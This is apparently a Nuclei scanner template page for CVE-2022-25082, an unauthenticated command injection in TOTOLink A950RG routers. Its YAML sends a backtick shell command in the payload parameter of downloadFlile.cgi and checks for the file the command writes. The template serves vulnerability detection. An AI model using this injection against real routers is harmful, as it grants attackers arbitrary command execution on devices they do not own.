Skip to content
Nuclei Templates

TOTOLink - Unauthenticated Command Injection

ID: CVE-2022-25082

Severity: critical

Author: gy741

Tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive

Description

Section titled “Description”

TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2022-25082


info:
  name: TOTOLink - Unauthenticated Command Injection
  author: gy741
  severity: critical
  description: |
    TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the command injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-25082
    - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25082
    cwe-id: CWE-78
    epss-score: 0.0417
    epss-percentile: 0.92196
    cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: totolink
    product: a950rg_firmware
  tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive
variables:
  cmd: "`ls>../{{randstr}}`"


http:
  - raw:
      - |
        GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /{{randstr}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - .sh
          - .cgi
        condition: and


      - type: word
        part: header_2
        words:
          - application/octet-stream


      - type: status
        status:
          - 200
# digest: 4a0a0047304502201d622d242eafd25733b530d1a066e43b0050808963d3238ba612069f0e5e57c80221008bbf87766815245758b580ad093cef8b30bc8c980c477531d41978088b7355bf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25082.yaml"

View on Github